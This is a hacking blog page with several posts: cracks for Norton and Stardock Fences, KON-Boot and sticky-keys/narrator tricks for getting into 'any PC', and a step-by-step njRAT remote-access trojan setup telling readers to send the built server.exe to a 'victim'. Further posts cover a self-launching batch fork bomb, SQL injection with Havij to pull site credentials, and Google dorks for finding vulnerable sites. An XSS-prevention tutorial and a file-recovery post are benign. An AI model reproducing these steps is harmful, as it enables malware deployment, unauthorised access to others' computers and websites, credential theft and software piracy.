Showing posts with label windows hacks. Show all posts
Showing posts with label windows hacks. Show all posts

Saturday, 11 January 2014

Norton antivirus 2014 life time activator free download Crack





Norton antivirus 2014 one click activator. With this automatic cracked key generator, full version is just a few clicks away. The success rates are more than 97%. Follow the steps and enjoy.

Features

  • Insight 
  • Norton community watch 
  • Sonar behavioral watch 
  • Internet protection system 
  • Download insights and ip address insight 
  • Live threat monitoring 
  • Anti fishing 
  • Safe web 
  • Network monitor 
  • Automatic updates 
  • And many more+++ 

Install Information

Install the Norton antivirus 2014. Download the trial from the official website
Turn off Norton Tamper Product Protection



Restart the system with safe mode (Press F8 key for safe mode)

Launch the crack NTR.

You will get a menu like this




Press the Reset/Convert button to Activate.

Enjoy. Leave a comment if have any problems.

Stardock Fences 2.12 Final full version with crack free download

Hey friends ,
   Have you just Upgraded or Installed Windows 8.1 OS in your system and do you couldnt get your old Fence working perfectly . Don't worry the latest release of Fence works perfectly fine I tested personlly.






Stardock Fence is a program that helps you organize desktop and hide icons when they're not in use.

  • Create "fences" on your desktop to organize icons
  • Hide and show your desktop icons with a click
  • Mirror your folders' contents on the desktop
  • Have new desktop icons automatically sorted into an appropriate "fence"
System Requirements:
*OS: Windows 8.1/8/7/Vista/XP (XP 32-bit only)
*Microsoft .NET Framework 2.0

What's New in Version 2.12 :
*Added allowing users to choose between rounded and 90 degree angle corner edges in the Fences config (defaulted by OS)
*Added prompt for email at trial activation
*Re-enabled touch features. This includes using two fingers to switch between desktop pages (enabled by default) and the ability to "flick" icons into fences (disabled by default). Both are options in the settings, on the "Desktop Pages" and "Layout and snapping" tabs respectively.
*Fixed Fences not showing on desktop/exist offscreen, out of res bounds
*Fixed Fence shifting icons into hidden third column
*Fixed show my desktop issue reactivated with information
*Fixed issue with Folder portals and visibility
*Fixed issue with name based rules and right click
*Fixed issue with bottomed aligned secondary monitors causes off-set Portal Fences
*Fixed a crash issue that has been haunting support where a target folder location had been changed
*Fixed issue with config UI blanking out
*Fixed issue with Fences not showing on desktop when they existed offscreen, out of the screen resolution
*Fixed issue with new files defaulting to the second monitor
*Fixed issue with the show desktop button in Windows when an active modal window was displaying in Fences
*Fixed issue with being unable to drag desktop pages when the taskbar was on the left or right
*Fixed issue with excluding icons from quickhide (like .website)
*Fixed issue when folder portal opacity was set to 0%
*Fixed where rules weren't sticking if assigned through right-click/...
*Removed Fences as a Control Panel item (kept causing problems)

 

 

Installation 

1. Install the program. But do not run it. 
      MAKE SURE FENCES IS NOT RUNNING BEFORE APPLYING PATCH!!! 
       DOUBLE CHECK THAT EVEN THROUGH TASK MANAGER!

2. Copy the contents of "Crack + Patch" folder to where Fences is installed e.g 
               C:\Program Files (x86)\Stardock\Fences. 

3. After that run the patch and click Patch button

4. Done, Enjoy !! :)

Sunday, 27 October 2013

How To Hack Windows Admin Account Using KON-Boot


Have you ever re-installed Windows again just because you forgot your Administrator Account password? Well you don't need to do that again, using this simple trick you can easily get into your Administrator Account and reset your password.
This trick can be used to hack ANY PC or Laptop, no matter what version of Windows are you using, you just need to know how to access the boot-menu and *Boom*.



I know there are also some other methods to do this job, but i believe that this is the easiest trick for a normal user without any technical knowledge of computers.
So before you continue reading, i want you to know that this tutorial is for educational purpose only, please DON’T use it to harm anyone.

Things you need:

  1. A USB Pen-drive (Memory Card can also be used, as Computer recognizes it as a USB device)
  2. KON-Boot

Step 1:

Download this little tool called KON-Boot from here and Extract it using WinRAR.


Also Read    Hack Windows XP/7/8 admin password easily without any software

Step 2:

Connect the USB and Format it.

Step 3:

Now go to the extracted KON-Boot folder and run “unetbootin-windows-323.exe
 

Step 4:

Select Discimage option, and Browse to the same extracted files and select “D0-konboot-v1.1-2in1.img” file.

Step 5:

In the bottom section of the window, choose the Drive Name (letter) of your USB Pen-drive, click Ok and wait for the process to complete.
This will install KON-Boot on your USB drive.
The Drive letter might be J: , K: or any other alphabet, depending on the number of partitions, DVD Drives and Other connected memory devices on your computer.

Step 6:

Now the best part :) Plug the USB into the PC you want to access, go to the BIOS settings and choose USB Flash Drive as the primary boot device.
e.g. In DELL you can simply press F9 while booting and select the USB FLASH DRIVE as boot device.





Also Read    Hack Windows XP/7/8 admin password easily without any software

Step 7:

When the PC boots from the USB device you’ll see the KON-Boot screen and the Windows will get started normally.

Step 8:

When the login screen comes up, just leave the password empty and hit Enter!! You’ll be logged into the administrator account without entering any password. :)
Leave comments below if you have any questions or need any help.


Hack Windows XP/7/8 admin password easily without any software

Hack Windows XP/7/8 admin password easily without any software


Hello guys. Here's a new 100% working trick to hack windows password .
I know there's a lot of softwares out there to get it done . But thats not geeky & also not time consuming . The real fun is when you can hack this manually within just a few minuets .

So here are the steps to do it.

Required things:

1) Windows 98 bootable USB drive ( We will learn to make it as we proceed) .
2) Basic knowledge of DOS commands .
3) Basic knowledge of how to boot your PC from a USB drive .

Theory:

Now you may wanna know the theory behind this hack . So here's how we do it .
In windows we can change the password of the PC with command prompt very easily .
with the command line net user username password . (replace username & password with the credentials you want ) . But this can be possible only if you have admin access to the command prompt . A command prompt with admin access is called elevated command prompt . When you simply open a command prompt window it brings you to the C:\users\username directory . But in an elevated command prompt you are brought to the C:\windows\system32 directory .

So if we can start an elevated command prompt window in the windows login screen, then we can run the above said command and change the password to what we want . So the main problem is how can we do this .

There are some programs which we can run directly from the login screen. These are our keys to hack a windows password .
The programs are:
1) sethc.exe ( windows xp , windows vista )
2) narrator.exe ( windows 7 , 8 )
3) magnify.exe ( windows 7 ,8 )
There are more but these will be enough for us . In windows 7 & 8 we can access them by clicking on the " Easy of Access " button in the login screen & then selecting "narrator" or "magnifier" then "apply" & then "OK"

All these files are stored in the C:\windows\system32 folder . And also the file for command prompt is stored in this folder ( named cmd.exe ).

So if we can replace one of those above mentioned files with cmd.exe & then if we start those programs in login screen, we can get an elevated command prompt & then type the net user command to change the password & we can gain access to the system .

Now the question is how to replace those files with command prompt when we have no access to the system ? The answer is by using a live OS which we can boot from an external USB drive & then accessing the file system through it. Most people will suggest you to use a Ubuntu live CD . But Ubuntu is near about 800 MB in size . So I'll suggest you to use MS-DOS 98 with an external usb drive which is 3 MB in size .

Now here are the steps to make a Bootable MS-DOS 98 usb drive:

1) Download DOS 98 from the link given below .
2) Download HP USB Disk Storage Format Tool form the below link .
3) Unzip & install the HP USB Disk Storage Format Tool .
4) Unzip DOS 98.zip and extract the folders ms-dos & ntfs dos . Remember the location .
5) Plug in your USB drive ( pen drive ) in your pc . ( make sure you backed up your contents of the pen drive, because your pen drive will be formatted . )
6) Now run HP USB Disk Storage Format Tool . ( in windows 7 right click on it & run as administrator ).
7) Now on the device window select your pen drive . In my case it's kimgston data travelar...



8)now in the file system select FAT . & tick both "quick format" & "Create a dos startup disk" .
9) now click on the 3 dots next to the box & select the ms-dos folder you extracted earlier . & press ok .









10) Now press start . Let the process complete .
11) Now copy the contents of NTFS folder in your pen drive .
Thats it . Now your bootable USB pen drive is ready .

Now here comes the main part.

Booting the target PC with this pen drive:

Switch on the target pc with the pen drive pluged in . And wait until a black ( sometime blue ) screen appears . There you will see some options like ** to enter setup , ** boot menu etc . In my case it's like F10 - to enter setup , Esc - Boot menu . Press the button which says Boot menu ( in my ps it's Escape button ) & select the pen drive from the list of available devices. Now you should see the dos window .

*Check your PC's BIOS manual for more info on accessing boot menu. Some PCs don't have the Boot menu . In such cases you need to Enter Bios setup by pressing the particular key ( in my case it's F10 ) & then change the boot device order as Removable media in the first place .

**To know more about how to change boot order of a PC follow these links or refer to the BIOS manual.

http://lifehacker.com/5991848/how-to-boot-from-a-cd-or-usb-drive-on-any-pc
http://pcsupport.about.com/od/fixtheproblem/ss/bootorderchange.htm


Real Hacking Begins Here:

If you booted correctly from the usb drive, you should now see the dos prompt. something like this with the C:\ prompt .



Now the first thing to do is to find out the windows instalation directory .
For this just change the drives serially , check for the windows directory in that drive with dir command .

Your commands should look like this:
C:\> D:  (press enter)                                              --------- Changes the prompt to drive D.
D:\> dir (press enter)                                               ---------  Lists all the files and folders in the drive D .
D:\> some results with files & folders.                       --------  Search for the windows folder here.

You should probably find it here in the drive D . If not then change the dir again to E . 

D:\> E:   (press enter)                                                --------- Changes the prompt to drive E.
E:\> dir   (press enter)                                               ---------  Lists all the files and folders in the drive E.
E:\> some results with files & folders                          --------  Search for the windows folder here.

If not found repeat the process with F , G , H , drives serially untill you get the windows folder .
In the below image the windows folder is in C drive . We get the below result after executing the following command .
C:\> dir (press enter )



 Now suppose you get the windows folder in D: drive .
You should return on the D:\> prompt automatically .

Now type the command cd windows\system32 (press enter).
You should now see D:\windows\system32> on the prompt .
Now type the following commands exactly as they are.

copy narrator.exe c: ( press enter )

copy cmd.exe c: (press enter)

del narrator.exe  (press enter)

ren cmd.exe narrator.exe (press enter)

 This should look like this.



 Thus we replaced the narrator.exe file with cmd.exe .

Now whenever we start the narrator process we will get the Elevated Command Prompt .

Changing The Password:

 
Now restart your PC normally . without the pen drive plugged in .
Now when you are on the login screen . Click on Easy of access on the left bottom corner . And tick the narrator > Apply > OK . In no time you'll get a command prompt window . Like DOS .

Now type in the command net user your_username your_new_password .
Suppose the user name is computer , then type net user computer 12345 (enter) . And the new password will be 12345 .
Now close the command prompt & enter your new password in the box & go . Bingo ! now you have access to the system .

***Note
In windows xp there's no "easy of access button" so you have to change the commands a little .


copy sethc.exe c: ( press enter )

copy cmd.exe c: (press enter)

del sethc.exe  (press enter)

ren cmd.exe sethc.exe (press enter) 

 And then on the login screen press "shift" key five times in a row & the command prompt will appear . Least of tutorial is same for windows xp .

If i was not clear at any point please let me know to help you out in the comments section.

This hack was successfully tested on win 7 & 8 . But i hope the above said WIN XP hack will also work . Let me know if it works.

I'm posting this tutorial only for the password recovery purpose in case you forgot your windows password . I'll not be responsible for any kind of illegal usage of this tutorial .  

 

Download links to the files:

 


                    HP USB Disk Storage Format Tool

                               MS-DOS 98+NTFS DOS

How to setup njrat 0.6.4 step by step 2014


Few year ago keylogger is most famous tool for hack account password and in keylogger many types available for send keylogger to victim like a remote keylogger but this all hard and limited to screenshot and keywords only
Change in technology demand to hack victim easy in 1 click

Today we learn here how to hack full computer using software / tool in few easy steps


njrat-0.6.4-rat


Njrat 0.6.4

Download Bf3 Keys Generator


Features :-

  • Process Injections
  • Hooks
  • USB Spreader feature 
  • Little Stub Size 100kb <
  • Easy To Crypt the files 
  • Stubsrc.rar is the source code of the stub if you're a decent applied scientist you'll be able to add practicality

Note:Don't delete file (stub.exe) and additionally do not execute it it is necessary to make a replacement bin .


How to Setup :-




  • Make no ip account here :- Click here
  • Now login no ip account and go in Host/redirects > Add host > 
  • Choose name of your no ip url Example :- xyz.zapto.com


no-ip-setting


  • Add Host and Download no ip client
  • Install no ip client and run client
  • Click on edit and put your no ip login details and Click Ok


login-no-ip


  • Now click edit host And tick/select url you created in account and click Save


host-selection


  • Now you almost done no-ip setting here


no-ip-login-done

Lets start rat setting


  • Run njrat.exe and click Builder


njrat-builder 

  • Put details same as photo
  • Just change host url with your url and Build own rat virus file


njrat-hacked-computer


You are done anything now

Send your server.exe file to friend or victim and when victim run your virus he/she automatically connected to your rat server


Note:- This tutorial only for learning purpose please do not damage any person, We are not responsible for any damage or action 

Sunday, 20 October 2013

Recover Deleted Files From External Hard Drive – How to

The advantages linked with this improvement are innumerable, but every fort when looked closely would show some bits of cracks in one to two bricks. You may have occurred to a thought once in your life that how much the digital data is important in your life and what if you lose it accidentally. Well, then surely you might find yourself engaged into trouble.




How to Recover Deleted Files From External Hard Drive


Below are a few simple steps to help you Recover Deleted Files from some external hard drive.
Prevent any further modifications in the drive you need to recover your data from : If you have clicked on the delete button accidentally, and you need to get your data back, then the most important thing you must keep in mind is that you should not try to make any amendments in the files on the drive. This means do not delete any other data, or add any data to the file. Just stop using it, and follow the proceeding steps.

Download a file Recovery Software from Internet (Recuva) : Simply browse to Google, and search for some file recovery software online. You will get a good list of results, and you can choose to select any one of them after reviewing their features and other details.

Recuva is one of the most popular applications with some good reviews, and you may try it.

Install the Software and Follow the Instructions : Once you find the appropriate software, you may proceed to install it on your system, and then run it. It would then provide you a list of drives connected to your computer. Simply select the drive you need to recover drives from, and start the scan. It would then provide you a list of files which existed on the drive in the past. Depending on the size of the drive, it may take time accordingly.

Choose the files : After the list has been generated, all you need to do is tic mark the files you want to recover, or select all if you need them all, and simply click on “Recover” button.

Some other Recovery Softwares:
Apart from Recuva, there are several other free tools available in the market online which may help you with the Recover Deleted Files The names include Puran FileRecovery, Glary Undelete, SoftPerfect File Recovery, Pandora Recovery, Restoration, Avira UnErase Personal, Free Undelete, ADRC Data Recovery Tools and CD Recover Toolbox.
All these applications are completely free of cost and has a user friendly interface. You may simple type “file recovery software” in Google to catch the best results, or query “download recuva” to directly take you to the download pages.

How to reset windows login password

Have you forgotten your windows login password? This is the common problem which may arrive to every user at some point of time. So, formatting your PC is one solution to your problem. But it may let you loose some of your important data, and overall its time consuming. I have a better solution than this.You can reset windows login password, or you can even reveal it, choice is yours. So today i am gonna teach you, how to reset windows login password. I will be showing tutorial using Ophcrack software. Let’s begin.
Note: This trick works for almost all windows versions.


                               How to reset windows login password


Ophcrack is a OS which can be used to crack passwords. It comes with a GUI which makes it more simple to use. It uses rainbow table attack for brute forcing.

How to reset windows Login Password??

 

 

  1.  First you have to download ophcrack live cd.
    Download it from here
  2. Go to the above site and choose the OS (xp, vista, win 7) and download the software.
  3. Downloaded software will be in .iso form. Burn it to a disc using PowerIso
  4. Now you have to boot the OS. For that insert the disc. Restart your PC and boot from disc.(Change boot priority using F12 or F8 and set it to boot from dvd/cd).
  5. After booting it will ask for manual, automatic etc.. Click on automatic.
  6. Then it will automatically start brute forcing. It will show users and in front of it the password resp. It may take some time to crack the password.
  7. For complicated passwords you can download free rainbow tables as per your OS from this LINK.
This was the method for resetting password through ophcrack. There are many software’s as well as live cd’s which you can use for resetting password.

Given below is the list of some software’s and live CD’s.

  • Active password changer
    It can be used to reset administrators password on WIndows Xp/Vista/2008/2003/2000 and windows 7 if forgotten or lost.
  • Cain and Abel
    It is a password recovery tool for Windows operating system. It uses attacks like brute forcing, sniffing the network, cryptanalysis etc.
  • Offline Password cracker
    Offline Password Cracker is an amazing password recovery tool but instead of actually recovering your Windows password like OPH Crack and similar tools do, it deletes it. Without a password, you’re allowed unrestricted access to your Windows operating system.
  • Hiren’s Multi-boot disc
    This is similar to ophcrack. It’s one of the most used Boot CD’s. It comes with many tools which can be used in different situations.It also comes with antivirus with latest update definition. It can be used to make backups and test your memory and other hardware’s.
  • Kon-Boot
    This is my favorite. If you boot with Kon-Boot, it will by pass the login and you can enter your PC without entering any password. Kon-boot doesnt works for Windows 7 and 64 bit operating system. It works on Linux also.
So these were the software’s and live CD’s which can be used to recover or reset your forgotten login password.

Wednesday, 18 September 2013

Absolute Beginner's Tutorial on Cross Site Scripting (XSS) Prevention in ASP.NET

In our last post we saw Trick to download facebook Photo Album-Link in this post we will see what is Cross Site Scripting(XSS). We will try to see some samples that are vulnerable to XSS and try to inject some scripts. We will then see how we can prevent XSS attacks in an ASP.NET website. Cross Site scripting is one of the problem that has plagued a lot of websites. According to WhiteHat Security Top Ten more than 50% of the websites are vulnerable to cross site scripting. As a web developer, it is important to understand what is cross site scripting and how can we safeguard our site from such attacks.

Cross site scripting is nothing but injection of client side scripts into a website. These scripts can be HTML scripts or JavaScript scripts. Now the question would be how can a person inject scripts on a running page. This can easily be done using all the various ways a website is collecting inputs. Cross site scripting can be performed by passing scripts in form of:

-TextBox (input controls)
-Query Strings
-Cookies
-Session variables
-Application variables
-Retrieved data from an external or shared source

Now let us see some very rudimentary example of cross site scripting and then we will try to see what ASP.NET provides to prevent cross site scripting. We will also look at the best practices that needs to be followed in order to make our website safe from cross site scripting attacks.

Now before writing applications that are vulnerable to cross site scripting we should know that ASP.NET provides some security out of the box against such attacks i.e. RequestValidations. This is a good thing for an ASP.NET developer. We will talk about it in the later part of the article but for now lets us see how can we disable this prevention mechanism.


Getting your Test Project Ready

The first thing that we need to do to disable the request validations is to set the ValidateRequest property of the page directive to false. If we need to do this for the whole website then we can do this from the web.config pages element.

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="Default.aspx.cs" Inherits="_Default" ValidateRequest="false" %>


Now, in order for the above setting to work we also need to change the requestValidationMode of the http Runtime to 2.0. The request validation will only be turned off when this mode is set to 2.0 otherwise it will not work.

<httpRuntime requestValidationMode="2.0"/>


We are disabling the request validation because we want to test the cross site scripting. without disabling it wont be possible to see cross site scripting in action. It is not recommended to turn off requestvalidation in production environment because this will open the website for cross site scripting attacks.


Perform XSS using Query Strings

Now let us create a simple web form that will simply accept a query string from the user and display the query string values on page.




The code behind this page looks like this: protected void Page_Load(object sender, EventArgs e)

{

      string id = Request.QueryString["id"] as string;

  

      if (id == null)

      

      {

               lblId.Text = "NA";

      }

      

      else 

      

      { 

      

               lblId.Text = id;



      }

}


Now under normal circumstances this will work just fine but if we try to pass some script in the query string variable then we have a problem. Let me now pass the query string parameter as:

Default.aspx?id=<h3>Hello from XSS"</h3>


and now when we open the page






And now herein lays the problem. The user can pass any HTML from the query string and that HTML will be rendered on the page. This was a very basic example but imagine an HTML with absolutely positioned tags and images could possibly wipe out the original page and show something else entirely.

Same thing can happen with JavaScript too. I can inject any javascript into this page. Let us try this:

Default.aspx?id=<script>alert('you have been hacked');</script>

and the output will be:





Preventing Cross Site Scripting:

ASP.NET websites developers have some advantages over other technologies because ASP.NET has some cross site scripting prevention logic baked into the framework itself i.e. RequestValidations. In our earlier examples we disabled it to check the cross site scripting but it is not at all recommended and should not be disabled unless it is a must.

If we enable the page with RequestValidation as true then we will get an error rather than modified page.






But apart from this in built default prevention mechanism developer should always follow the following guidelines to prevent XSS.

1. Constrain the user input to the characters that are acceptable for that particular field.
2. Never trust user input. Always encode all the user inputs before processing them.
3. If data is coming from an external source or a shared source, never show raw data. Always encode the data before displaying it to the user.

Now let us go back to our XSS prone page again. We will add one more textbox and button on the page to see how we can constrain user input.

We can always use JavaScript filters to constrain the user input. Let us apply some javascript based filters on this new text box so that we will only accept alpha numeric characters and noting else.


<asp:TextBox ID="TextBox2" runat="server" onkeypress="return AcceptAlphaNumericOnly(event, false, false);"></asp:TextBox>

Now this will prevent the user from typing any unwanted characters in the textbox. We should also check for and remove the unwanted characters on server side too because client side scripts can be bypassed easily(even in the above text box we can paste the copied scripts).

Now as for the encoding the user input part. Let us add a similar textbox again and put the the logic for encoding the user input in for this.


protected void lblMessage3.Text = "Hello " + encodedinput; Button3_Click(object sender, EventArgs e)



{

           string rawInput = TextBox3.Text; 

           string encodedinput = Server.HtmlEncode(rawInput);

       lblMessage3.Text = "Hello " + encodedinput;

}

Now if we try to inject something in using this textbox, the output will be:




Same should be done if the data is coming from an external or shared source. We should never trust the data that is not created by us.

So now we know some basic prevention mechanism that could prevent our site from cross site scripting. Along with these mechanism, use of some stable third party cross site scripting protection library is also advisable. One such library is AntiXSS (http://wpl.codeplex.com/). Use of such libraries will provide the prevention in conditions where the framework and framework functions are falling short.









Tuesday, 20 August 2013

How To Make A USB E-bomb

In our last post we saw about  How-to-create-facebook-fan-page in sites and blog  , in this post we will see how to make e-Bomb

Steps :




1. Open Wordpad, Notepad or Notepad ++.

2. Type "start e-bomb.bat"

3. Save the file as "e-bomb.bat" with the settings: "All files"

4. Copy the file from the folder you saved it in and paste it on a USB memory stick.

5. Run the .bat file, and there you go!

To stop the E-bomb, simply pull out the USB Memory stick and close all the windows that popped up. If you let it run for a little while your computer may become laggy, so be aware.

Good luck!

Friday, 16 August 2013

How to Reset Bios Password

In this post we will see how to reset the Bios Password,
There are basically  many methods  to reset the BIOS Passwords ....
They are As Follows

1. Using a software  ( s0me require ADMIN access , nd If linux , then what ? :D  )
2. Using master passwords ( different for different BIOS manufacturers )
3. Using DEBUG console  ( Doesnot work in Win 7 nd ab0ve since Microsoft rem0ved debug.exe )
4. Using cmos battery  ( regardless of any OS )
5. Using cmos jumper  (  Regardless of any OS )

I ll explain about all of them ...................................................................
  
1. There are many softwares available on internet ( eg. cmos remover ) which have database for many BIOS manufacturers , BUT requires Admin access ,  So U fail here !


2.  Every BIOS manufacturing company uses Master passwords , Incase U forgot ur one , this can help them in accessing BIOS again even if U forgot ur password for BIOS
( What I doubt is that since everybody knows abt it , So now companies have eliminated this , Still U can try out )


3. If u Have  Windows 7 below i.e. anything except windows 8 or 7  , then theirs a command that clears cmos memory Gare , but only drawback is  BILL GATES removed  debug.exe from win 7


4.  Regardless of a Computer or Laptop , All of them have a small battery , Called cmos battery Coz that powers it .... In laptop's It is usually soldered .   What  u have to do is to remove the battery , Keep the computer or Laptop DEAD for 10 minutes , then without battery switch on the device ...
N0w again shutdown , Keep it in DEAD state for another DEAD minutes . N0w put the battery back its Place and switch the Device on ...................... U reseted the BIOS password  !!!


5.  As 4. point all devices also have a cmos jumper , It is found on your motherboard as battery is found , Just change its orientation .. Switch the device On , Then shut it off .  Then change the orientation back to what it was and reboot the device ................. U reseted the BIOS password  !!!


Monday, 12 August 2013

Hack Websites Using Havij [SQL Injection Tutorial]

  As said on my previous post now i will Show you step by step the process of SQL injection.



STEPS :

Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.




Step2: Now click on the Analyse button as shown below.



Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:


Step3: Now click on the Tables button and then click Get Tables button from below column as shown below:


Step4: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.





If you dont have Havij the downlod form the below link


Download

Countermeasures: 

Here are some of the countermeasures you can take to reduce the risk of SQL Injection


  1. Renaming the admin page will make it difficult for a hacker to locate it
  2. Use a Intrusion detection system and compose the signatures for popular SQL injection strings
  3. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

Finding SQL Vulnerable Sites Easily


   Hello friends ,
                    Today am gonna help you to find SQL Vulnerable in Websites , so let me tell you what is SQL injection first.


SQL injectionSQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

I - Intro :

What you need to know is that 95% of the websites are vulnerable. That's why you need to improve your searching methods, to get better that the rest of the hackers. A scanner may help you, but it will never remplace your brain and often, you're much better than it to find vulnerabilities fast and easy.. We're gonna now speak about useful things to

A - The common google dorks

Search on the sub-domains : site:1.com
Search ONLY on the principal domain : site:www.1.com
Search in the URL : inurl: / allinurl:
Search for a specific file extension : filetype:
Search in the text : intext: / allintext:
Search in the title : intitle:
Search for a domain extension : site:* (fr/gov/mil/edu/org/..)

B - Web file extensions

Common web files extensions where fails are localized : PHP ; CFM ; HTM/HTML ; ASP ; ASPX .

All the other webfiles extensions where a fail may comes up (if you are lucky) : ASMX ; SWF ; DO ; PDF ; SEAM...

Note : Sometimes, you will have an URL like this : http://website.gov/?id=1
It may be vulnerable too but that's extremly rare.

C - Variables

Variables are necessary for SQL injections. Common ones are : id= ; pid= ; file= ; lang= ; pageid= ; path= ; rub= ; option= ; task=

D - What Search engine/Broswer should i use ?

Google, of course. Also, you must know that firefox is, for me, the more convenient to search SQL fails : fast and effective.

II - Become a pro :

First, it might sound stupid but you need to write very fastly. The hacker who don't will spent many time and then, abandons. In fact, a good thing to do is to open something like 5 tabs and use all what
you know about dorks and file extensions. I suggest you, when you are looking for SQL vulns, to search ONLY on ONE website : when you have a fail, that's good, but if you have a fail on your selected
website, that's better.
Here's is an example ;

Tab 1 - site:1.com inurl:cfm?id=
Tab 2 - site:www.1.com inurl:cfm?
Tab 3 - site:1.com inurl:php? inurl:id
Tab 4 - site:www.1.com inurl:asp
Tab 5 - site:1.com inrul:aspx?id

Note : instead of site:1.com , you can do site:*.1.com
Note 2 : You can do this with only 1 tab too, but you need to be really fast - e.g. If you don't have any results, go back immedialty to the previous page and change the dorks.

90% of the time while using this method, i find an SQL vulnerability on the website of my choice in few minutes.

III - A smart trick to use :

When you don't know which type of web file the vuln will infect, you can search by using only the variable.
Example :

inurl:id=1
inurl:lang=1

If you're good, you will get loads of good results with this dork.

IV - A special one

Okay, first it's not a common method, it don't works many times ; Sometimes, try to create a variable.
Example : http://site.gov/staff/graph.php
What yo do : http://site.gov/staff/graph.php?id=1

Why does it may work ? Because ID is a really used variable. So, when you have created it, you can try to inject.

    In my next post i will show you how to use Havij to hack a website so stay tuned .. :)


 

Subscribe to our Newsletter

Contact our Support

Email : ajai199@gmail.com